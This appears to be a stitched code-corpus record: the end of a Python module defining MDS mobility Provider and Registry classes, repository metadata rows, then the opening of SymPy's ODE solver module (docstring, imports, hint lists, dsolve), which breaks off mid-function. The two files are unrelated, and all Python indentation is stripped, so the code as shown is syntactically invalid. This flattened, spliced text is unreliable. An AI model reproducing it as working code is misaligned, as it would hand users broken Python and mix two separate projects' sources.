self.auth_type = kwargs.pop("auth_type", "Bearer")
self.gbfs_api_url = self._clean_url(kwargs.pop("gbfs_api_url", None))
self.headers = kwargs.pop("headers", {})
self.mds_api_suffix = kwargs.pop("mds_api_suffix", None)
self.mds_api_url = self._clean_url(kwargs.pop("mds_api_url", None))
self.registry_path = path
self.registry_ref = ref
self.url = self._clean_url(kwargs.pop("url", None))
try:
self.version = Version(ref)
except:
pass
for k,v in kwargs.items():
setattr(self, k, v)
# copy Provider instance
elif isinstance(identifier, Provider):
_kwargs = vars(identifier)
_kwargs.update(kwargs)
Provider.__init__(self, ref=identifier.registry_ref, path=identifier.registry_path, **_kwargs)
# interrogate the registry
else:
provider = Registry(ref=ref, path=path).find(identifier, **kwargs)
if provider:
Provider.__init__(self, provider)
def __repr__(self):
ref, name, pid, url = (
self.registry_ref or self.registry_path,
self.provider_name,
str(self.provider_id),
self.mds_api_url
)
return f"<mds.providers.Provider ('{ref}', '{name}', '{pid}', '{url}')>"
@property
def endpoints(self):
endpoint = [self.mds_api_url]
if self.mds_api_suffix:
endpoint.append(self.mds_api_suffix.rstrip("/"))
return {
STATUS_CHANGES: "/".join(endpoint + [STATUS_CHANGES]),
TRIPS: "/".join(endpoint + [TRIPS]),
EVENTS: "/".join(endpoint + [EVENTS]),
VEHICLES: "/".join(endpoint + [VEHICLES])
}
@staticmethod
def _clean_url(url):
"""
Helper to return a normalized URL
"""
if url:
url = url.lower().rstrip("/")
return url if url.startswith("https://") else f"https://{url}"
else:
return None
class Registry():
"""
Represents a local or remote Provider registry.
See: https://github.com/CityOfLosAngeles/mobility-data-specification/blob/master/providers.csv
"""
_registry = {}
def __init__(self, ref=mds.github.MDS_DEFAULT_REF, path=None, **kwargs):
"""
Parameters:
ref: str, Version
The reference (git commit, branch, tag, or version) at which to query the registry.
By default, download from GitHub master.
path: str, Path, optional
A path to a local registry file to skip the GitHub download.
"""
key = (str(ref), path)
if key not in self._registry:
self._registry[key] = self._get_registry(*key)
self.providers = self._registry[key]
self.ref = ref
self.path = path
def __repr__(self):
data = "'" + "', '".join([str(self.ref or self.path), str(len(self.providers)) + " providers"]) + "'"
return f"<mds.files.Registry ({data})>"
def find(self, provider, **kwargs):
"""
Find a Provider instance in this Registry.
Parameters:
provider: str, UUID
A provider_id or provider_name to look for in the registry.
Additional keyword arguments are set as attributes on the Provider instance.
Return:
Provider
The matching Provider instance, or None.
"""
try:
provider = uuid.UUID(provider)
except ValueError:
pass
# filter for matching provider(s)
found = next((p for p in self.providers if any([
isinstance(provider, str) and p.provider_name.lower() == provider.lower(),
isinstance(provider, uuid.UUID) and p.provider_id == provider
])), None)
# re-init with the record from registry and config
return Provider(found, **kwargs) if found else None
@staticmethod
def _get_registry(ref, path):
if path:
path = pathlib.Path(path)
with path.open("r") as f:
return Registry._parse_csv(f.readlines(), ref=ref, path=path)
else:
url = mds.github.registry_url(ref)
with requests.get(url, stream=True) as r:
lines = (line.decode("utf-8").replace(", ", ",") for line in r.iter_lines())
return Registry._parse_csv(lines, ref=ref, path=path)
@staticmethod
def _parse_csv(lines, **kwargs):
"""
Parse CSV lines into a list of Provider instances.
"""
return [Provider(**record, **kwargs) for record in csv.DictReader(lines)]
| 33.096447
| 109
| 0.578681
|
a2f1bd3eb2a46babe18ad78a473d78638f160382
| 277,100
|
py
|
Python
|
sympy/solvers/ode/ode.py
|
mijo2/sympy
|
8a6beee32556d42c6d0b1c1687681b3b2cfed9b9
|
[
"BSD-3-Clause"
] | 1
|
2020-12-26T05:30:08.000Z
|
2020-12-26T05:30:08.000Z
|
sympy/solvers/ode/ode.py
|
mijo2/sympy
|
8a6beee32556d42c6d0b1c1687681b3b2cfed9b9
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/solvers/ode/ode.py
|
mijo2/sympy
|
8a6beee32556d42c6d0b1c1687681b3b2cfed9b9
|
[
"BSD-3-Clause"
] | null | null | null |
r"""
This module contains :py:meth:`~sympy.solvers.ode.dsolve` and different helper
functions that it uses.
:py:meth:`~sympy.solvers.ode.dsolve` solves ordinary differential equations.
See the docstring on the various functions for their uses. Note that partial
differential equations support is in ``pde.py``. Note that hint functions
have docstrings describing their various methods, but they are intended for
internal use. Use ``dsolve(ode, func, hint=hint)`` to solve an ODE using a
specific hint. See also the docstring on
:py:meth:`~sympy.solvers.ode.dsolve`.
**Functions in this module**
These are the user functions in this module:
- :py:meth:`~sympy.solvers.ode.dsolve` - Solves ODEs.
- :py:meth:`~sympy.solvers.ode.classify_ode` - Classifies ODEs into
possible hints for :py:meth:`~sympy.solvers.ode.dsolve`.
- :py:meth:`~sympy.solvers.ode.checkodesol` - Checks if an equation is the
solution to an ODE.
- :py:meth:`~sympy.solvers.ode.homogeneous_order` - Returns the
homogeneous order of an expression.
- :py:meth:`~sympy.solvers.ode.infinitesimals` - Returns the infinitesimals
of the Lie group of point transformations of an ODE, such that it is
invariant.
- :py:meth:`~sympy.solvers.ode.checkinfsol` - Checks if the given infinitesimals
are the actual infinitesimals of a first order ODE.
These are the non-solver helper functions that are for internal use. The
user should use the various options to
:py:meth:`~sympy.solvers.ode.dsolve` to obtain the functionality provided
by these functions:
- :py:meth:`~sympy.solvers.ode.ode.odesimp` - Does all forms of ODE
simplification.
- :py:meth:`~sympy.solvers.ode.ode.ode_sol_simplicity` - A key function for
comparing solutions by simplicity.
- :py:meth:`~sympy.solvers.ode.constantsimp` - Simplifies arbitrary
constants.
- :py:meth:`~sympy.solvers.ode.ode.constant_renumber` - Renumber arbitrary
constants.
- :py:meth:`~sympy.solvers.ode.ode._handle_Integral` - Evaluate unevaluated
Integrals.
See also the docstrings of these functions.
**Currently implemented solver methods**
The following methods are implemented for solving ordinary differential
equations. See the docstrings of the various hint functions for more
information on each (run ``help(ode)``):
- 1st order separable differential equations.
- 1st order differential equations whose coefficients or `dx` and `dy` are
functions homogeneous of the same order.
- 1st order exact differential equations.
- 1st order linear differential equations.
- 1st order Bernoulli differential equations.
- Power series solutions for first order differential equations.
- Lie Group method of solving first order differential equations.
- 2nd order Liouville differential equations.
- Power series solutions for second order differential equations
at ordinary and regular singular points.
- `n`\th order differential equation that can be solved with algebraic
rearrangement and integration.
- `n`\th order linear homogeneous differential equation with constant
coefficients.
- `n`\th order linear inhomogeneous differential equation with constant
coefficients using the method of undetermined coefficients.
- `n`\th order linear inhomogeneous differential equation with constant
coefficients using the method of variation of parameters.
**Philosophy behind this module**
This module is designed to make it easy to add new ODE solving methods without
having to mess with the solving code for other methods. The idea is that
there is a :py:meth:`~sympy.solvers.ode.classify_ode` function, which takes in
an ODE and tells you what hints, if any, will solve the ODE. It does this
without attempting to solve the ODE, so it is fast. Each solving method is a
hint, and it has its own function, named ``ode_<hint>``. That function takes
in the ODE and any match expression gathered by
:py:meth:`~sympy.solvers.ode.classify_ode` and returns a solved result. If
this result has any integrals in it, the hint function will return an
unevaluated :py:class:`~sympy.integrals.integrals.Integral` class.
:py:meth:`~sympy.solvers.ode.dsolve`, which is the user wrapper function
around all of this, will then call :py:meth:`~sympy.solvers.ode.ode.odesimp` on
the result, which, among other things, will attempt to solve the equation for
the dependent variable (the function we are solving for), simplify the
arbitrary constants in the expression, and evaluate any integrals, if the hint
allows it.
**How to add new solution methods**
If you have an ODE that you want :py:meth:`~sympy.solvers.ode.dsolve` to be
able to solve, try to avoid adding special case code here. Instead, try
finding a general method that will solve your ODE, as well as others. This
way, the :py:mod:`~sympy.solvers.ode` module will become more robust, and
unhindered by special case hacks. WolframAlpha and Maple's
DETools[odeadvisor] function are two resources you can use to classify a
specific ODE. It is also better for a method to work with an `n`\th order ODE
instead of only with specific orders, if possible.
To add a new method, there are a few things that you need to do. First, you
need a hint name for your method. Try to name your hint so that it is
unambiguous with all other methods, including ones that may not be implemented
yet. If your method uses integrals, also include a ``hint_Integral`` hint.
If there is more than one way to solve ODEs with your method, include a hint
for each one, as well as a ``<hint>_best`` hint. Your ``ode_<hint>_best()``
function should choose the best using min with ``ode_sol_simplicity`` as the
key argument. See
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_best`, for example.
The function that uses your method will be called ``ode_<hint>()``, so the
hint must only use characters that are allowed in a Python function name
(alphanumeric characters and the underscore '``_``' character). Include a
function for every hint, except for ``_Integral`` hints
(:py:meth:`~sympy.solvers.ode.dsolve` takes care of those automatically).
Hint names should be all lowercase, unless a word is commonly capitalized
(such as Integral or Bernoulli). If you have a hint that you do not want to
run with ``all_Integral`` that doesn't have an ``_Integral`` counterpart (such
as a best hint that would defeat the purpose of ``all_Integral``), you will
need to remove it manually in the :py:meth:`~sympy.solvers.ode.dsolve` code.
See also the :py:meth:`~sympy.solvers.ode.classify_ode` docstring for
guidelines on writing a hint name.
Determine *in general* how the solutions returned by your method compare with
other methods that can potentially solve the same ODEs. Then, put your hints
in the :py:data:`~sympy.solvers.ode.allhints` tuple in the order that they
should be called. The ordering of this tuple determines which hints are
default. Note that exceptions are ok, because it is easy for the user to
choose individual hints with :py:meth:`~sympy.solvers.ode.dsolve`. In
general, ``_Integral`` variants should go at the end of the list, and
``_best`` variants should go before the various hints they apply to. For
example, the ``undetermined_coefficients`` hint comes before the
``variation_of_parameters`` hint because, even though variation of parameters
is more general than undetermined coefficients, undetermined coefficients
generally returns cleaner results for the ODEs that it can solve than
variation of parameters does, and it does not require integration, so it is
much faster.
Next, you need to have a match expression or a function that matches the type
of the ODE, which you should put in :py:meth:`~sympy.solvers.ode.classify_ode`
(if the match function is more than just a few lines, like
:py:meth:`~sympy.solvers.ode.ode._undetermined_coefficients_match`, it should go
outside of :py:meth:`~sympy.solvers.ode.classify_ode`). It should match the
ODE without solving for it as much as possible, so that
:py:meth:`~sympy.solvers.ode.classify_ode` remains fast and is not hindered by
bugs in solving code. Be sure to consider corner cases. For example, if your
solution method involves dividing by something, make sure you exclude the case
where that division will be 0.
In most cases, the matching of the ODE will also give you the various parts
that you need to solve it. You should put that in a dictionary (``.match()``
will do this for you), and add that as ``matching_hints['hint'] = matchdict``
in the relevant part of :py:meth:`~sympy.solvers.ode.classify_ode`.
:py:meth:`~sympy.solvers.ode.classify_ode` will then send this to
:py:meth:`~sympy.solvers.ode.dsolve`, which will send it to your function as
the ``match`` argument. Your function should be named ``ode_<hint>(eq, func,
order, match)``. If you need to send more information, put it in the ``match``
dictionary. For example, if you had to substitute in a dummy variable in
:py:meth:`~sympy.solvers.ode.classify_ode` to match the ODE, you will need to
pass it to your function using the `match` dict to access it. You can access
the independent variable using ``func.args[0]``, and the dependent variable
(the function you are trying to solve for) as ``func.func``. If, while trying
to solve the ODE, you find that you cannot, raise ``NotImplementedError``.
:py:meth:`~sympy.solvers.ode.dsolve` will catch this error with the ``all``
meta-hint, rather than causing the whole routine to fail.
Add a docstring to your function that describes the method employed. Like
with anything else in SymPy, you will need to add a doctest to the docstring,
in addition to real tests in ``test_ode.py``. Try to maintain consistency
with the other hint functions' docstrings. Add your method to the list at the
top of this docstring. Also, add your method to ``ode.rst`` in the
``docs/src`` directory, so that the Sphinx docs will pull its docstring into
the main SymPy documentation. Be sure to make the Sphinx documentation by
running ``make html`` from within the doc directory to verify that the
docstring formats correctly.
If your solution method involves integrating, use :py:obj:`~.Integral` instead of
:py:meth:`~sympy.core.expr.Expr.integrate`. This allows the user to bypass
hard/slow integration by using the ``_Integral`` variant of your hint. In
most cases, calling :py:meth:`sympy.core.basic.Basic.doit` will integrate your
solution. If this is not the case, you will need to write special code in
:py:meth:`~sympy.solvers.ode.ode._handle_Integral`. Arbitrary constants should be
symbols named ``C1``, ``C2``, and so on. All solution methods should return
an equality instance. If you need an arbitrary number of arbitrary constants,
you can use ``constants = numbered_symbols(prefix='C', cls=Symbol, start=1)``.
If it is possible to solve for the dependent function in a general way, do so.
Otherwise, do as best as you can, but do not call solve in your
``ode_<hint>()`` function. :py:meth:`~sympy.solvers.ode.ode.odesimp` will attempt
to solve the solution for you, so you do not need to do that. Lastly, if your
ODE has a common simplification that can be applied to your solutions, you can
add a special case in :py:meth:`~sympy.solvers.ode.ode.odesimp` for it. For
example, solutions returned from the ``1st_homogeneous_coeff`` hints often
have many :obj:`~sympy.functions.elementary.exponential.log` terms, so
:py:meth:`~sympy.solvers.ode.ode.odesimp` calls
:py:meth:`~sympy.simplify.simplify.logcombine` on them (it also helps to write
the arbitrary constant as ``log(C1)`` instead of ``C1`` in this case). Also
consider common ways that you can rearrange your solution to have
:py:meth:`~sympy.solvers.ode.constantsimp` take better advantage of it. It is
better to put simplification in :py:meth:`~sympy.solvers.ode.ode.odesimp` than in
your method, because it can then be turned off with the simplify flag in
:py:meth:`~sympy.solvers.ode.dsolve`. If you have any extraneous
simplification in your function, be sure to only run it using ``if
match.get('simplify', True):``, especially if it can be slow or if it can
reduce the domain of the solution.
Finally, as with every contribution to SymPy, your method will need to be
tested. Add a test for each method in ``test_ode.py``. Follow the
conventions there, i.e., test the solver using ``dsolve(eq, f(x),
hint=your_hint)``, and also test the solution using
:py:meth:`~sympy.solvers.ode.checkodesol` (you can put these in separate
tests and skip/XFAIL them if they run too slowly or don't work). Be sure to call your
hint specifically in :py:meth:`~sympy.solvers.ode.dsolve`, that way the test
won't be broken simply by the introduction of another matching hint. If your
method works for higher order (>1) ODEs, you will need to run ``sol =
constant_renumber(sol, 'C', 1, order)`` for each solution, where ``order`` is
the order of the ODE. This is because ``constant_renumber`` renumbers the
arbitrary constants by printing order, which is platform dependent. Try to
test every corner case of your solver, including a range of orders if it is a
`n`\th order solver, but if your solver is slow, such as if it involves hard
integration, try to keep the test run time down.
Feel free to refactor existing hints to avoid duplicating code or creating
inconsistencies. If you can show that your method exactly duplicates an
existing method, including in the simplicity and speed of obtaining the
solutions, then you can remove the old, less general method. The existing
code is tested extensively in ``test_ode.py``, so if anything is broken, one
of those tests will surely fail.
"""
from __future__ import print_function, division
from collections import defaultdict
from itertools import islice
from sympy.functions import hyper
from sympy.core import Add, S, Mul, Pow, oo, Rational
from sympy.core.compatibility import ordered, iterable
from sympy.core.containers import Tuple
from sympy.core.exprtools import factor_terms
from sympy.core.expr import AtomicExpr, Expr
from sympy.core.function import (Function, Derivative, AppliedUndef, diff,
expand, expand_mul, Subs, _mexpand)
from sympy.core.multidimensional import vectorize
from sympy.core.numbers import NaN, zoo, Number
from sympy.core.relational import Equality, Eq
from sympy.core.symbol import Symbol, Wild, Dummy, symbols
from sympy.core.sympify import sympify
from sympy.logic.boolalg import (BooleanAtom, BooleanTrue,
BooleanFalse)
from sympy.functions import cos, cosh, exp, im, log, re, sin, sinh, sqrt, \
atan2, conjugate, cbrt, besselj, bessely, airyai, airybi
from sympy.functions.combinatorial.factorials import factorial
from sympy.integrals.integrals import Integral, integrate
from sympy.matrices import wronskian
from sympy.polys import (Poly, RootOf, rootof, terms_gcd,
PolynomialError, lcm, roots, gcd)
from sympy.polys.polytools import cancel, degree, div
from sympy.series import Order
from sympy.series.series import series
from sympy.simplify import (collect, logcombine, powsimp, # type: ignore
separatevars, simplify, trigsimp, posify, cse)
from sympy.simplify.powsimp import powdenest
from sympy.simplify.radsimp import collect_const
from sympy.solvers import checksol, solve
from sympy.solvers.pde import pdsolve
from sympy.utilities import numbered_symbols, default_sort_key, sift
from sympy.utilities.iterables import uniq
from sympy.solvers.deutils import _preprocess, ode_order, _desolve
from .subscheck import sub_func_doit
#: This is a list of hints in the order that they should be preferred by
#: :py:meth:`~sympy.solvers.ode.classify_ode`. In general, hints earlier in the
#: list should produce simpler solutions than those later in the list (for
#: ODEs that fit both). For now, the order of this list is based on empirical
#: observations by the developers of SymPy.
#:
#: The hint used by :py:meth:`~sympy.solvers.ode.dsolve` for a specific ODE
#: can be overridden (see the docstring).
#:
#: In general, ``_Integral`` hints are grouped at the end of the list, unless
#: there is a method that returns an unevaluatable integral most of the time
#: (which go near the end of the list anyway). ``default``, ``all``,
#: ``best``, and ``all_Integral`` meta-hints should not be included in this
#: list, but ``_best`` and ``_Integral`` hints should be included.
allhints = (
"factorable",
"nth_algebraic",
"separable",
"1st_exact",
"1st_linear",
"Bernoulli",
"Riccati_special_minus2",
"1st_homogeneous_coeff_best",
"1st_homogeneous_coeff_subs_indep_div_dep",
"1st_homogeneous_coeff_subs_dep_div_indep",
"almost_linear",
"linear_coefficients",
"separable_reduced",
"1st_power_series",
"lie_group",
"nth_linear_constant_coeff_homogeneous",
"nth_linear_euler_eq_homogeneous",
"nth_linear_constant_coeff_undetermined_coefficients",
"nth_linear_euler_eq_nonhomogeneous_undetermined_coefficients",
"nth_linear_constant_coeff_variation_of_parameters",
"nth_linear_euler_eq_nonhomogeneous_variation_of_parameters",
"Liouville",
"2nd_linear_airy",
"2nd_linear_bessel",
"2nd_hypergeometric",
"2nd_hypergeometric_Integral",
"nth_order_reducible",
"2nd_power_series_ordinary",
"2nd_power_series_regular",
"nth_algebraic_Integral",
"separable_Integral",
"1st_exact_Integral",
"1st_linear_Integral",
"Bernoulli_Integral",
"1st_homogeneous_coeff_subs_indep_div_dep_Integral",
"1st_homogeneous_coeff_subs_dep_div_indep_Integral",
"almost_linear_Integral",
"linear_coefficients_Integral",
"separable_reduced_Integral",
"nth_linear_constant_coeff_variation_of_parameters_Integral",
"nth_linear_euler_eq_nonhomogeneous_variation_of_parameters_Integral",
"Liouville_Integral",
)
lie_heuristics = (
"abaco1_simple",
"abaco1_product",
"abaco2_similar",
"abaco2_unique_unknown",
"abaco2_unique_general",
"linear",
"function_sum",
"bivariate",
"chi"
)
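
# Illustrative sketch (not part of the original module): the general shape of a
# hint solver, as described in the "How to add new solution methods" section of
# the module docstring above.  The hint name, the match key 'g' and the ODE form
# f'(x) = g(x) used here are hypothetical.
def _example_ode_my_hint(eq, func, order, match):
    # A hint function receives the ODE ``eq``, the unknown ``func`` (e.g. f(x)),
    # the ODE ``order`` and the ``match`` dict built by classify_ode().  It
    # returns an Equality and leaves integrals unevaluated, so that the
    # ``_Integral`` variant of the hint stays cheap.
    from sympy import Eq, Integral, Symbol
    x = func.args[0]
    C1 = Symbol('C1')
    g = match['g']  # hypothetical: right-hand side of f'(x) = g(x)
    return Eq(func, Integral(g, x) + C1)
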
def get_numbered_constants(eq, num=1, start=1, prefix='C'):
"""
Returns a list of constants that do not occur
in eq already.
"""
ncs = iter_numbered_constants(eq, start, prefix)
Cs = [next(ncs) for i in range(num)]
return (Cs[0] if num == 1 else tuple(Cs))
def iter_numbered_constants(eq, start=1, prefix='C'):
"""
Returns an iterator of constants that do not occur
in eq already.
"""
if isinstance(eq, (Expr, Eq)):
eq = [eq]
elif not iterable(eq):
raise ValueError("Expected Expr or iterable but got %s" % eq)
atom_set = set().union(*[i.free_symbols for i in eq])
func_set = set().union(*[i.atoms(Function) for i in eq])
if func_set:
atom_set |= {Symbol(str(f.func)) for f in func_set}
return numbered_symbols(start=start, prefix=prefix, exclude=atom_set)
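
# Minimal usage sketch (illustrative only, not part of the original module):
# constants that already occur in the expression are skipped, so the helpers
# above never shadow an existing C1.
def _example_numbered_constants():
    from sympy import Function, Symbol
    from sympy.abc import x
    f = Function('f')
    C1 = Symbol('C1')
    # C1 occurs in the expression, so the next two free constants are C2 and C3.
    return get_numbered_constants(f(x) + C1*x, num=2)
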
def dsolve(eq, func=None, hint="default", simplify=True,
ics= None, xi=None, eta=None, x0=0, n=6, **kwargs):
r"""
Solves any (supported) kind of ordinary differential equation and
system of ordinary differential equations.
For single ordinary differential equation
=========================================
    It is classified under this when the number of equations in ``eq`` is one.
**Usage**
``dsolve(eq, f(x), hint)`` -> Solve ordinary differential equation
``eq`` for function ``f(x)``, using method ``hint``.
**Details**
``eq`` can be any supported ordinary differential equation (see the
:py:mod:`~sympy.solvers.ode` docstring for supported methods).
This can either be an :py:class:`~sympy.core.relational.Equality`,
or an expression, which is assumed to be equal to ``0``.
``f(x)`` is a function of one variable whose derivatives in that
variable make up the ordinary differential equation ``eq``. In
many cases it is not necessary to provide this; it will be
autodetected (and an error raised if it couldn't be detected).
``hint`` is the solving method that you want dsolve to use. Use
``classify_ode(eq, f(x))`` to get all of the possible hints for an
ODE. The default hint, ``default``, will use whatever hint is
returned first by :py:meth:`~sympy.solvers.ode.classify_ode`. See
Hints below for more options that you can use for hint.
``simplify`` enables simplification by
:py:meth:`~sympy.solvers.ode.ode.odesimp`. See its docstring for more
information. Turn this off, for example, to disable solving of
solutions for ``func`` or simplification of arbitrary constants.
It will still integrate with this hint. Note that the solution may
contain more arbitrary constants than the order of the ODE with
this option enabled.
``xi`` and ``eta`` are the infinitesimal functions of an ordinary
differential equation. They are the infinitesimals of the Lie group
of point transformations for which the differential equation is
invariant. The user can specify values for the infinitesimals. If
nothing is specified, ``xi`` and ``eta`` are calculated using
:py:meth:`~sympy.solvers.ode.infinitesimals` with the help of various
heuristics.
``ics`` is the set of initial/boundary conditions for the differential equation.
It should be given in the form of ``{f(x0): x1, f(x).diff(x).subs(x, x2):
x3}`` and so on. For power series solutions, if no initial
conditions are specified ``f(0)`` is assumed to be ``C0`` and the power
series solution is calculated about 0.
``x0`` is the point about which the power series solution of a differential
equation is to be evaluated.
``n`` gives the exponent of the dependent variable up to which the power series
solution of a differential equation is to be evaluated.
**Hints**
Aside from the various solving methods, there are also some meta-hints
that you can pass to :py:meth:`~sympy.solvers.ode.dsolve`:
``default``:
This uses whatever hint is returned first by
:py:meth:`~sympy.solvers.ode.classify_ode`. This is the
default argument to :py:meth:`~sympy.solvers.ode.dsolve`.
``all``:
To make :py:meth:`~sympy.solvers.ode.dsolve` apply all
relevant classification hints, use ``dsolve(ODE, func,
hint="all")``. This will return a dictionary of
``hint:solution`` terms. If a hint causes dsolve to raise the
            ``NotImplementedError``, the value of that hint's key will be the
exception object raised. The dictionary will also include
some special keys:
- ``order``: The order of the ODE. See also
:py:meth:`~sympy.solvers.deutils.ode_order` in
``deutils.py``.
- ``best``: The simplest hint; what would be returned by
``best`` below.
- ``best_hint``: The hint that would produce the solution
given by ``best``. If more than one hint produces the best
solution, the first one in the tuple returned by
:py:meth:`~sympy.solvers.ode.classify_ode` is chosen.
- ``default``: The solution that would be returned by default.
This is the one produced by the hint that appears first in
the tuple returned by
:py:meth:`~sympy.solvers.ode.classify_ode`.
``all_Integral``:
This is the same as ``all``, except if a hint also has a
corresponding ``_Integral`` hint, it only returns the
``_Integral`` hint. This is useful if ``all`` causes
:py:meth:`~sympy.solvers.ode.dsolve` to hang because of a
difficult or impossible integral. This meta-hint will also be
much faster than ``all``, because
:py:meth:`~sympy.core.expr.Expr.integrate` is an expensive
routine.
``best``:
To have :py:meth:`~sympy.solvers.ode.dsolve` try all methods
and return the simplest one. This takes into account whether
the solution is solvable in the function, whether it contains
any Integral classes (i.e. unevaluatable integrals), and
which one is the shortest in size.
See also the :py:meth:`~sympy.solvers.ode.classify_ode` docstring for
more info on hints, and the :py:mod:`~sympy.solvers.ode` docstring for
a list of all supported hints.
**Tips**
- You can declare the derivative of an unknown function this way:
>>> from sympy import Function, Derivative
>>> from sympy.abc import x # x is the independent variable
>>> f = Function("f")(x) # f is a function of x
>>> # f_ will be the derivative of f with respect to x
>>> f_ = Derivative(f, x)
        - See ``test_ode.py`` for many tests, which also serves as a set of
examples for how to use :py:meth:`~sympy.solvers.ode.dsolve`.
- :py:meth:`~sympy.solvers.ode.dsolve` always returns an
:py:class:`~sympy.core.relational.Equality` class (except for the
case when the hint is ``all`` or ``all_Integral``). If possible, it
solves the solution explicitly for the function being solved for.
Otherwise, it returns an implicit solution.
- Arbitrary constants are symbols named ``C1``, ``C2``, and so on.
- Because all solutions should be mathematically equivalent, some
hints may return the exact same result for an ODE. Often, though,
two different hints will return the same solution formatted
differently. The two should be equivalent. Also note that sometimes
the values of the arbitrary constants in two different solutions may
not be the same, because one constant may have "absorbed" other
constants into it.
        - Do ``help(ode.ode_<hintname>)`` to get more information on a
specific hint, where ``<hintname>`` is the name of a hint without
``_Integral``.
For system of ordinary differential equations
=============================================
**Usage**
``dsolve(eq, func)`` -> Solve a system of ordinary differential
equations ``eq`` for ``func`` being list of functions including
`x(t)`, `y(t)`, `z(t)` where number of functions in the list depends
upon the number of equations provided in ``eq``.
**Details**
        ``eq`` can be any supported system of ordinary differential equations.
This can either be an :py:class:`~sympy.core.relational.Equality`,
or an expression, which is assumed to be equal to ``0``.
``func`` holds ``x(t)`` and ``y(t)`` being functions of one variable which
together with some of their derivatives make up the system of ordinary
differential equation ``eq``. It is not necessary to provide this; it
will be autodetected (and an error raised if it couldn't be detected).
**Hints**
        The hints are formed from the parameters returned by classify_sysode;
        combining them gives the hint name, which is later used to form the method name.
Examples
========
>>> from sympy import Function, dsolve, Eq, Derivative, sin, cos, symbols
>>> from sympy.abc import x
>>> f = Function('f')
>>> dsolve(Derivative(f(x), x, x) + 9*f(x), f(x))
Eq(f(x), C1*sin(3*x) + C2*cos(3*x))
>>> eq = sin(x)*cos(f(x)) + cos(x)*sin(f(x))*f(x).diff(x)
>>> dsolve(eq, hint='1st_exact')
[Eq(f(x), -acos(C1/cos(x)) + 2*pi), Eq(f(x), acos(C1/cos(x)))]
>>> dsolve(eq, hint='almost_linear')
[Eq(f(x), -acos(C1/cos(x)) + 2*pi), Eq(f(x), acos(C1/cos(x)))]
>>> t = symbols('t')
>>> x, y = symbols('x, y', cls=Function)
>>> eq = (Eq(Derivative(x(t),t), 12*t*x(t) + 8*y(t)), Eq(Derivative(y(t),t), 21*x(t) + 7*t*y(t)))
>>> dsolve(eq)
[Eq(x(t), C1*x0(t) + C2*x0(t)*Integral(8*exp(Integral(7*t, t))*exp(Integral(12*t, t))/x0(t)**2, t)),
Eq(y(t), C1*y0(t) + C2*(y0(t)*Integral(8*exp(Integral(7*t, t))*exp(Integral(12*t, t))/x0(t)**2, t) +
exp(Integral(7*t, t))*exp(Integral(12*t, t))/x0(t)))]
>>> eq = (Eq(Derivative(x(t),t),x(t)*y(t)*sin(t)), Eq(Derivative(y(t),t),y(t)**2*sin(t)))
>>> dsolve(eq)
{Eq(x(t), -exp(C1)/(C2*exp(C1) - cos(t))), Eq(y(t), -1/(C1 - cos(t)))}
"""
if iterable(eq):
from sympy.solvers.ode.systems import dsolve_system
        # This may have to be changed in the future,
        # when we have weakly and strongly
        # connected components. It will then have to be
        # changed to show the systems that haven't
        # been solved.
try:
sol = dsolve_system(eq, funcs=func, ics=ics)
return sol[0] if len(sol) == 1 else sol
except NotImplementedError:
pass
match = classify_sysode(eq, func)
eq = match['eq']
order = match['order']
func = match['func']
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
# keep highest order term coefficient positive
for i in range(len(eq)):
for func_ in func:
if isinstance(func_, list):
pass
else:
if eq[i].coeff(diff(func[i],t,ode_order(eq[i], func[i]))).is_negative:
eq[i] = -eq[i]
match['eq'] = eq
if len(set(order.values()))!=1:
raise ValueError("It solves only those systems of equations whose orders are equal")
match['order'] = list(order.values())[0]
def recur_len(l):
return sum(recur_len(item) if isinstance(item,list) else 1 for item in l)
if recur_len(func) != len(eq):
raise ValueError("dsolve() and classify_sysode() work with "
"number of functions being equal to number of equations")
if match['type_of_equation'] is None:
raise NotImplementedError
else:
if match['is_linear'] == True:
solvefunc = globals()['sysode_linear_%(no_of_equation)seq_order%(order)s' % match]
else:
solvefunc = globals()['sysode_nonlinear_%(no_of_equation)seq_order%(order)s' % match]
sols = solvefunc(match)
if ics:
constants = Tuple(*sols).free_symbols - Tuple(*eq).free_symbols
solved_constants = solve_ics(sols, func, constants, ics)
return [sol.subs(solved_constants) for sol in sols]
return sols
else:
given_hint = hint # hint given by the user
# See the docstring of _desolve for more details.
hints = _desolve(eq, func=func,
hint=hint, simplify=True, xi=xi, eta=eta, type='ode', ics=ics,
x0=x0, n=n, **kwargs)
eq = hints.pop('eq', eq)
all_ = hints.pop('all', False)
if all_:
retdict = {}
failed_hints = {}
gethints = classify_ode(eq, dict=True)
orderedhints = gethints['ordered_hints']
for hint in hints:
try:
rv = _helper_simplify(eq, hint, hints[hint], simplify)
except NotImplementedError as detail:
failed_hints[hint] = detail
else:
retdict[hint] = rv
func = hints[hint]['func']
retdict['best'] = min(list(retdict.values()), key=lambda x:
ode_sol_simplicity(x, func, trysolving=not simplify))
if given_hint == 'best':
return retdict['best']
for i in orderedhints:
if retdict['best'] == retdict.get(i, None):
retdict['best_hint'] = i
break
retdict['default'] = gethints['default']
retdict['order'] = gethints['order']
retdict.update(failed_hints)
return retdict
else:
# The key 'hint' stores the hint needed to be solved for.
hint = hints['hint']
return _helper_simplify(eq, hint, hints, simplify, ics=ics)
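
# Hedged usage sketch of the meta-hints handled above (illustrative only):
# ``hint='all'`` returns a dict keyed by hint name (plus the special keys
# 'order', 'best', 'best_hint' and 'default'), while ``hint='best'`` returns
# only the simplest solution as judged by ode_sol_simplicity().
def _example_dsolve_meta_hints():
    from sympy import Function
    from sympy.abc import x
    f = Function('f')
    eq = f(x).diff(x) - f(x)
    every = dsolve(eq, f(x), hint='all')   # dict of hint -> solution
    best = dsolve(eq, f(x), hint='best')   # a single Eq, the simplest one
    return every['best'] == best
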
def _helper_simplify(eq, hint, match, simplify=True, ics=None, **kwargs):
r"""
Helper function of dsolve that calls the respective
:py:mod:`~sympy.solvers.ode` functions to solve for the ordinary
differential equations. This minimizes the computation in calling
:py:meth:`~sympy.solvers.deutils._desolve` multiple times.
"""
r = match
func = r['func']
order = r['order']
match = r[hint]
if isinstance(match, SingleODESolver):
solvefunc = match
elif hint.endswith('_Integral'):
solvefunc = globals()['ode_' + hint[:-len('_Integral')]]
else:
solvefunc = globals()['ode_' + hint]
free = eq.free_symbols
cons = lambda s: s.free_symbols.difference(free)
if simplify:
# odesimp() will attempt to integrate, if necessary, apply constantsimp(),
# attempt to solve for func, and apply any other hint specific
# simplifications
if isinstance(solvefunc, SingleODESolver):
